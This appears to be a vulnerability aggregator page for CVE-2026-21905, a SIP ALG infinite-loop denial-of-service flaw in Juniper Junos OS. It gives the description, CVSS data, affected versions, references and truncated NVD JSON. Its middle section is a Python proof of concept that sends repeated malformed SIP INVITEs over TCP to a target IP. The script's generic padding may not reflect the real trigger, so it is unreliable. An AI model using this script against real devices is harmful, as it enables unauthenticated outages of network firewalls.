CVE-2026-21905

Description

A Loop with Unreachable Exit Condition ('Infinite Loop') vulnerability in the SIP application layer gateway (ALG) of Juniper Networks Junos OS on SRX Series and MX Series with MX-SPC3 or MS-MPC allows an unauthenticated network-based attacker sending specific SIP messages over TCP to crash the flow management process, leading to a Denial of Service (DoS). On SRX Series, and MX Series with MX-SPC3 or MS-MPC service cards, receipt of multiple SIP messages causes the SIP headers to be parsed incorrectly, eventually causing a continuous loop and leading to a watchdog timer expiration, crashing the flowd process on SRX Series and MX Series with MX-SPC3, or mspmand process on MX Series with MS-MPC. This issue only occurs over TCP. SIP messages sent over UDP cannot trigger this issue. This issue affects Junos OS on SRX Series and MX Series with MX-SPC3 and MS-MPC: * all versions before 21.2R3-S10, * from 21.4 before 21.4R3-S12, * from 22.4 before 22.4R3-S8, * from 23.2 before 23.2R2-S5, * from 23.4 before 23.4R2-S6, * from 24.2 before 24.2R2-S3, * from 24.4 before 24.4R2-S1, * from 25.2 before 25.2R1-S1, 25.2R2.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:juniper:junos:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:juniper:junos:21.2:-:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:juniper:junos:21.2:r1:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:juniper:junos:21.2:r1-s1:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:juniper:junos:21.2:r1-s2:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:juniper:mx10004:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:h:juniper:mx10008:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:h:juniper:mx2008:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:h:juniper:mx2010:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:h:juniper:mx2020:-:*:*:*:*:*:*:* - NOT VULNERABLE

Juniper Junos OS (SRX Series, MX Series) < 21.2R3-S10

Juniper Junos OS (SRX Series, MX Series) >= 21.4 且 < 21.4R3-S12

Juniper Junos OS (SRX Series, MX Series) >= 22.4 且 < 22.4R3-S8

Juniper Junos OS (SRX Series, MX Series) >= 23.2 且 < 23.2R2-S5

Juniper Junos OS (SRX Series, MX Series) >= 23.4 且 < 23.4R2-S6

Juniper Junos OS (SRX Series, MX Series) >= 24.2 且 < 24.2R2-S3

Juniper Junos OS (SRX Series, MX Series) >= 24.4 且 < 24.4R2-S1

Juniper Junos OS (SRX Series, MX Series) >= 25.2 且 < 25.2R1-S1, 25.2R2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import socket import struct import time def send_sip_tcp_packet(target_ip, target_port=5060): """ PoC for CVE-2026-21905 - Juniper Junos SIP ALG Infinite Loop Note: This is for educational/testing purposes only """ # Malformed SIP INVITE with malformed headers to trigger parsing loop sip_message = b'INVITE sip:[email protected] SIP/2.0\r\n' sip_message += b'Via: SIP/2.0/TCP ' + b'A' * 500 + b'\r\n' sip_message += b'From: <sip:[email protected]>;tag=malformed' + b'B' * 500 + b'\r\n' sip_message += b'To: <sip:[email protected]>\r\n' sip_message += b'Call-ID: infinite_loop_test\r\n' sip_message += b'CSeq: 1 INVITE\r\n' sip_message += b'Max-Forwards: 70\r\n' sip_message += b'Content-Length: 0\r\n\r\n' try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(10) sock.connect((target_ip, target_port)) # Send multiple malformed packets to trigger the condition for i in range(10): sock.send(sip_message) time.sleep(0.5) print(f'Packet {i+1} sent') sock.close() print('PoC execution completed') except Exception as e: print(f'Error: {e}') if __name__ == '__main__': target = input('Enter target IP: ') send_sip_tcp_packet(target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-21905
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-21905
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-21905/
[4] VulDB https://vuldb.com/cve/CVE-2026-21905
[5] https://kb.juniper.net/JSA106004
[6] https://supportportal.juniper.net/JSA106004

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-21905", "sourceIdentifier": "[email protected]", "published": "2026-01-15T21:16:05.990", "lastModified": "2026-01-23T19:40:26.687", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A Loop with Unreachable Exit Condition ('Infinite Loop') vulnerability in the SIP application layer gateway (ALG) of Juniper Networks Junos OS on SRX Series and MX Series with MX-SPC3 or MS-MPC allows an unauthenticated network-based attacker sending specific SIP messages over TCP to crash the flow management process, leading to a Denial of Service (DoS).\n\nOn SRX Series, and MX Series with MX-SPC3 or MS-MPC service cards, receipt of multiple SIP messages causes the SIP headers to be parsed incorrectly, eventually causing a continuous loop and leading to a watchdog timer expiration, crashing the flowd process on SRX Series and MX Series with MX-SPC3, or mspmand process on MX Series with MS-MPC.\n\nThis issue only occurs over TCP. SIP messages sent over UDP cannot trigger this issue.\n\nThis issue affects Junos OS on SRX Series and MX Series with MX-SPC3 and MS-MPC:\n\n\n\n * all versions before 21.2R3-S10, \n * from 21.4 before 21.4R3-S12, \n * from 22.4 before 22.4R3-S8, \n * from 23.2 before 23.2R2-S5, \n * from 23.4 before 23.4R2-S6, \n * from 24.2 before 24.2R2-S3, \n * from 24.4 before 24.4R2-S1, \n * from 25.2 before 25.2R1-S1, 25.2R2."}, {"lang": "es", "value": "Una vulnerabilidad de Bucle con Condición de Salida Inalcanzable ('Bucle Infinito') en el gateway de capa de aplicación SIP (ALG) de Juniper Networks Junos OS en las series SRX y MX con MX-SPC3 o MS-MPC permite a un atacante no autenticado basado en red que envía mensajes SIP específicos a través de TCP bloquear el proceso de gestión de flujo, lo que lleva a una Denegación de Servicio (DoS).\n\nEn las series SRX y MX con tarjetas de servicio MX-SPC3 o MS-MPC, la recepción de múltiples mensajes SIP provoca que los encabezados SIP se analicen incorrectamente, lo que finalmente causa un bucle continuo y lleva a la expiración de un temporizador watchdog, bloqueando el proceso flowd en las series SRX y MX con MX-SPC3, o el proceso mspmand en las series MX con MS-MPC.\n\nEste problema solo ocurre a través de TCP. Los mensajes SIP enviados a través de UDP no pueden desencadenar este problema.\n\nEste problema afecta a Junos OS en las series SRX y MX con MX-SPC3 y MS-MPC:\n\n * todas las versiones anteriores a 21.2R3-S10,\n * desde 21.4 anteriores a 21.4R3-S12,\n * desde 22.4 anteriores a 22.4R3-S8,\n * desde 23.2 anteriores a 23.2R2-S5,\n * desde 23.4 anteriores a 23.4R2-S6,\n * desde 24.2 anteriores a 24.2R2-S3,\n * desde 24.4 anteriores a 24.4R2-S1,\n * desde 25.2 anteriores a 25.2R1-S1, 25.2R2."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:Y/R:A/V:C/RE:M/U:Amber", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "LOW", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "YES", "Recovery": "AUTOMATIC", "valueDensity": "CONCENTRATED", "vulnerabilityResponseEffort": "MODERATE", "providerUrgency": "AMBER"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-835"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "c ... (truncated)